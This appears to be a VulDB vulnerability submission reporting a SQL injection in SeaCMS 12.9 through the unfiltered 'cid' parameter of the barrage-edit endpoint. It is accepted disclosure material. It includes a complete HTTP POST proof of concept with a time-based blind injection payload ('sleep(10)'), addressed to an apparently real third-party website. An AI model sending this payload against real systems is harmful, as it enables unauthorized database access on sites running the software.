| Title | SeaCMS 12.9 SQL Injection |
|---|
| Description | You can see the detailed exploit details on my blog, the password is fushuling123:https://fushuling.com/index.php/2024/06/24/test4/
I found a sql injection vulnerability in the latest version of SeaCMS 12.9(https://github.com/seacms-net/CMS)
The editing barrage function did not filter the incoming parameter cid, resulting in SQL injection
POST /js/player/dmplayer/dmku/?ac=edit HTTP/1.1
Host: www.zgsande.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=6b04qldqagem4l9fp190rjliuq; Hm_lvt_e4d0024e5f5773755a3348e62c014398=1718814023; Hm_lpvt_e4d0024e5f5773755a3348e62c014398=1718814023
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
cid=(select(0)from(select(sleep(10)))v) |
|---|
| Source | ⚠️ https://github.com/seacms-net/CMS |
|---|
| User | fushuling (UID 45488) |
|---|
| Submission | 06/24/2024 14:47 (2 years ago) |
|---|
| Moderation | 06/30/2024 16:42 (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 270007 [SeaCMS 12.9 ?ac=edit cid sql injection] |
|---|
| Points | 20 |
|---|